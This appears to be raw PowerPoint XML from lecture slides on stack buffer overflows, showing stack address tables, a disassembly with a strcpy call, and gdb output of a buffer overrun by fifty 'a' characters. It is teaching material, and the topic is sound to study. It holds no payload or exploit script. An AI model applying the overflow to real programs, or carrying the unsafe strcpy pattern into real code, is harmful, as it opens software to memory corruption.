          </a:solidFill>
          <a:ln w="635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solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff63c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="3038035"/>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0xbffff640</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964404" y="25559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0xbffff646</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4747670" y="305359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 name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4224759" y="4641448"/>
            <a:ext cx="4838218" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0xbffff8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>5c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0xbffff8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>5c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 'a' &lt;repeats 50 times&gt;, "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bcde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\020c\346\267L", &lt;incomplete sequence \370\267&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1922091724"/>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600678785"/>
              </p:ext>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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff714</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xb7f8684c</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xb7e66310</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff85c</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff646</a:t>
                      </a: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331</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="49075" y="35704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0xbffff67c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="94931180"/>
              </p:ext>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0xbffff646</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0xbffff63c</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0xbffff678</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>804843a</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80482f0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>804841d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048420</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048423</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048426</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048429</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804842b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804842f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048432</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048435</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804843a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804843f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048440</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>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0xbffff678</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121979" y="1729012"/>
            <a:ext cx="278606" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="635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solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff63c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="3038035"/>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0xbffff640</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964404" y="25559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0xbffff646</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4755547" y="333048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Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="1765141"/>
            <a:ext cx="2831284" cy="93025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 * 50</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1799011412"/>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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff714</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xb7f8684c</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xb7e66310</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff85c</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff646</a:t>
                      </a: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332</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="49075" y="35704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0xbffff67c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="753426276"/>
              </p:ext>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0xa</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0xbffff63c</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0xbffff678</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>804843f</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80482f0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>804841d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048420</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048423</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048426</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048429</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804842b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804842f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048432</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048435</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804843a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804843f</a:t>
